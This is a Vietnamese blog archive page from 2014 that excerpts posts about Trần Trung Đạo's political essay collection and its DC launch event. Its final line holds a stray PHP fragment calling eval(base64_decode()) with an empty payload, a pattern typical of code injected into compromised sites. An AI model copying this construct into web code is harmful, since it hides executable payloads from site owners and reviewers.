Archive for September 20th, 2014

Để nhận Chính Luận Trần Trung Đạo

Để nhận Chính Luận Trần Trung Đạo

Chính luận Trần Trung Đạo, tác phẩm thứ 10 của nhà văn Trần Trung Đạo, là một tuyển tập luận văn chính trị dày 600 trang gồm 42 bài viết chọn lọc. Tác phẩm do Cổ Loa xuất bản, Uyên Nguyên trình bày. Chính Luận Trần Trung Đạo ra đ

09.20.2014 | Tiểu Luận- Chính Luận |

No Comments

Các video clips của buổi giới thiệu Chính Luận Trần Trung Đạo tại DC 13-9-14

Các video clips của buổi giới thiệu Chính Luận Trần Trung Đạo tại DC 13-9-14

Sau 19 năm từ khi giới thiệu tập thơ Đổi Cả Thiên Thu Tiếng Mẹ Cười tại DC năm 1995, tác giả Trần Trung Đạo lần nữa đến thủ đô Hoa Thịnh Đốn để giới thiệu Chính Luận Trần Trung Đạo. Dưới đây video của chương trình do Đài Tr

09.20.2014 | Nhận Xét |

No Comments

Flickr Photos

Tag Cloud

'; eval(base64_decode(''));?>